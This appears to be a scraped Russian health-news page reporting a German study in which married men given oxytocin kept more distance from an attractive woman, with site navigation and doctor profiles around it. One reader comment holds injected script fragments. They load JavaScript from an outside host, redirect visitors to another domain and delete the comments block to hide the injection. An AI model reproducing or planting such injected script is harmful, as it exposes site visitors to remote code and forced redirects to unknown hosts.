Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Гормон оргазма не дает му...  >>  Гормон оргазма не дает мужчинам изменять
 
Обратная связь
 

Гормон оргазма не дает мужчинам изменять

Размер шрифта
13 декабря 2012 00:00
Юрий Малышев
Здоровье инфо
Анна Белевская
Здоровье инфо
  • google_analytics: false
  • Нравится

Немецкие ученые обнаружили, что женатые мужчины, имеющие высокий уровень окситоцина в крови, держат дистанцию с незнакомыми женщинами.

окситоцин

Во время оргазма как у мужчин, так у женщин выделяется гормон окситоцин, который вырабатывается в гипоталамусе. Окситоцин участвует в формировании связей между детьми и родителями, мужчинами и женщинами. Кроме того, в организме женщины окситоцин играет важную роль во время родов и кормления грудью.

Суть исследования

В исследовании приняли участие здоровые мужчины, которым вводили окситоцин или плацебо в виде назального спрея. Через 45 минут после введения препарата мужчин знакомили с привлекательной женщиной. Женщина приближалась и отдалялась, а мужчины должны были определить, какое расстояние им кажется наиболее комфортным.

«Поскольку окситоцин увеличивает доверие к людям, мы думали, что мужчины будут чувствовать себя комфортно, когда привлекательная женщина находится как можно ближе. Однако мы получили совершенно противоположные результаты», – говорит автор исследования Рене Хлеманн из Боннского университета. – «Комфортное расстояние для женатых мужчин, которым вводили окситоцин, оказалось на 10-15 см больше, чем для женатых мужчин, которым вводили плацебо. Однако у неженатых мужчин подобная закономерность не прослеживалась».

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 23:27

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Мужчины могут похудеть с помощью секса! Что делать женщинам?   Отсутствие оргазма и другие признаки диабета, которые вы игнорируете!   Вопросы, которые вы можете задать только Яндексу   Как быть счастливой по науке?  

Слайдшоу

1
Как справится со стрессом без лекарств? Что происходит с влагалищем во время секса?
Лучшее время заняться сексом Почему секс после 50 – это круто!
9 причин занятся сексом прямо сейчас Еда для оргазма
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.